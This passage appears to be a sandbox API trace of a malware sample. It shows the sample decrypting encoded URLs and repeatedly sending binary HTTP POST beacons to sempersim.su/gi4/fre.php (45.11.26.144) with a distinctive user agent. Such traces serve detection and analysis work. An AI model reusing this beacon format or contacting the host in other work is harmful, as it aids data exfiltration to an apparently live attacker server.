Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0215.644] GetProcessHeap () returned 0x5b0000 [0215.644] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0215.644] GetProcessHeap () returned 0x5b0000 [0215.645] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0215.645] GetProcessHeap () returned 0x5b0000 [0215.645] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0215.645] GetProcessHeap () returned 0x5b0000 [0215.645] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0215.646] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0215.646] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0215.646] GetProcessHeap () returned 0x5b0000 [0215.646] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0215.646] GetProcessHeap () returned 0x5b0000 [0215.647] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0215.647] send (s=0x32c, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0215.647] send (s=0x32c, buf=0x5d1e18*, len=159, flags=0) returned 159 [0215.648] GetProcessHeap () returned 0x5b0000 [0215.648] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0215.648] recv (in: s=0x32c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0217.069] GetProcessHeap () returned 0x5b0000 [0217.070] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0217.070] GetProcessHeap () returned 0x5b0000 [0217.070] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0217.070] GetProcessHeap () returned 0x5b0000 [0217.070] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0217.070] GetProcessHeap () returned 0x5b0000 [0217.071] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0217.071] closesocket (s=0x32c) returned 0 [0217.071] GetProcessHeap () returned 0x5b0000 [0217.071] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0217.071] GetProcessHeap () returned 0x5b0000 [0217.072] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0217.072] GetProcessHeap () returned 0x5b0000 [0217.073] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0217.073] GetProcessHeap () returned 0x5b0000 [0217.073] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0217.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1274) returned 0x32c [0217.076] Sleep (dwMilliseconds=0xea60) [0217.093] GetProcessHeap () returned 0x5b0000 [0217.093] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0217.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.094] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0217.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.101] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0217.114] GetProcessHeap () returned 0x5b0000 [0217.114] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0217.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.115] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0217.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.116] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0217.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.117] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.117] GetProcessHeap () returned 0x5b0000 [0217.118] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0217.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.119] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0217.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.119] CryptDestroyKey (hKey=0x5bde08) returned 1 [0217.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.120] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0217.120] GetProcessHeap () returned 0x5b0000 [0217.120] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0217.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.121] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.122] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.122] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.123] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.123] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.124] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.124] GetProcessHeap () returned 0x5b0000 [0217.124] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0217.124] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0217.124] GetProcessHeap () returned 0x5b0000 [0217.124] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0217.124] GetProcessHeap () returned 0x5b0000 [0217.125] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0217.125] GetProcessHeap () returned 0x5b0000 [0217.125] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0217.129] GetProcessHeap () returned 0x5b0000 [0217.129] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0217.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.131] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0217.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.139] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0217.149] GetProcessHeap () returned 0x5b0000 [0217.149] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0217.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.150] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0217.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.151] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0217.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.152] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.152] GetProcessHeap () returned 0x5b0000 [0217.152] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0217.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.154] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0217.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.155] CryptDestroyKey (hKey=0x5be288) returned 1 [0217.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0217.159] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0217.159] GetProcessHeap () returned 0x5b0000 [0217.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0217.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.160] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0217.160] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.161] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0217.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.162] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0217.162] GetProcessHeap () returned 0x5b0000 [0217.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0217.162] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce0b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0217.163] GetProcessHeap () returned 0x5b0000 [0217.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8b0 [0217.163] socket (af=2, type=1, protocol=6) returned 0x330 [0217.163] connect (s=0x330, name=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0217.235] FreeAddrInfoW (pAddrInfo=0x5ce0b0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0217.235] GetProcessHeap () returned 0x5b0000 [0217.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0217.235] GetProcessHeap () returned 0x5b0000 [0217.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0217.236] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0217.237] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0217.237] GetProcessHeap () returned 0x5b0000 [0217.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0217.237] GetProcessHeap () returned 0x5b0000 [0217.237] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0217.237] GetProcessHeap () returned 0x5b0000 [0217.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3350 [0217.237] GetProcessHeap () returned 0x5b0000 [0217.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0217.238] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0217.239] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0217.239] GetProcessHeap () returned 0x5b0000 [0217.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0217.239] GetProcessHeap () returned 0x5b0000 [0217.239] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0217.240] send (s=0x330, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0217.240] send (s=0x330, buf=0x5d1e18*, len=159, flags=0) returned 159 [0217.240] GetProcessHeap () returned 0x5b0000 [0217.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0217.240] recv (in: s=0x330, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0218.541] GetProcessHeap () returned 0x5b0000 [0218.542] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0218.542] GetProcessHeap () returned 0x5b0000 [0218.542] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3350 | out: hHeap=0x5b0000) returned 1 [0218.542] GetProcessHeap () returned 0x5b0000 [0218.542] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0218.542] GetProcessHeap () returned 0x5b0000 [0218.543] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0218.543] closesocket (s=0x330) returned 0 [0218.544] GetProcessHeap () returned 0x5b0000 [0218.544] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8b0 | out: hHeap=0x5b0000) returned 1 [0218.544] GetProcessHeap () returned 0x5b0000 [0218.544] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0218.544] GetProcessHeap () returned 0x5b0000 [0218.544] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0218.544] GetProcessHeap () returned 0x5b0000 [0218.545] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0218.545] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x72c) returned 0x330 [0218.547] Sleep (dwMilliseconds=0xea60) [0218.567] GetProcessHeap () returned 0x5b0000 [0218.567] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2f60 [0218.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.568] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0218.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.581] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0218.589] GetProcessHeap () returned 0x5b0000 [0218.589] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0218.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.590] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0218.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.591] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0218.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.592] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.592] GetProcessHeap () returned 0x5b0000 [0218.592] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0218.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.596] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2f60, pdwDataLen=0xdfcfc | out: pbData=0x5d2f60, pdwDataLen=0xdfcfc) returned 1 [0218.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.597] CryptDestroyKey (hKey=0x5bde08) returned 1 [0218.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.598] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0218.598] GetProcessHeap () returned 0x5b0000 [0218.598] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d56e8 [0218.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.600] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0218.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.601] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0218.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.602] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0218.602] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.603] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0218.603] GetProcessHeap () returned 0x5b0000 [0218.603] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0218.603] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0218.603] GetProcessHeap () returned 0x5b0000 [0218.604] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0218.604] GetProcessHeap () returned 0x5b0000 [0218.604] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0218.604] GetProcessHeap () returned 0x5b0000 [0218.605] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0218.605] GetProcessHeap () returned 0x5b0000 [0218.605] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d34b8 [0218.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.606] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0218.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.616] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0218.624] GetProcessHeap () returned 0x5b0000 [0218.624] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0218.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.628] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0218.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.629] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0218.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.630] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0218.630] GetProcessHeap () returned 0x5b0000 [0218.631] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0218.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.632] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d34b8, pdwDataLen=0xdfcfc | out: pbData=0x5d34b8, pdwDataLen=0xdfcfc) returned 1 [0218.632] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.633] CryptDestroyKey (hKey=0x5bde08) returned 1 [0218.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0218.634] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0218.634] GetProcessHeap () returned 0x5b0000 [0218.634] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0218.635] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.635] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0218.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.636] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0218.637] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.637] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0218.637] GetProcessHeap () returned 0x5b0000 [0218.637] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0218.637] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdae8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0218.644] GetProcessHeap () returned 0x5b0000 [0218.644] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0218.644] socket (af=2, type=1, protocol=6) returned 0x334 [0218.644] connect (s=0x334, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0218.726] FreeAddrInfoW (pAddrInfo=0x5cdae8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0218.726] GetProcessHeap () returned 0x5b0000 [0218.726] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0218.726] GetProcessHeap () returned 0x5b0000 [0218.726] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0218.727] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0218.728] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0218.728] GetProcessHeap () returned 0x5b0000 [0218.728] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0218.728] GetProcessHeap () returned 0x5b0000 [0218.729] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0218.729] GetProcessHeap () returned 0x5b0000 [0218.729] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0218.729] GetProcessHeap () returned 0x5b0000 [0218.729] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0218.729] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0218.730] wvsprintfA (in: 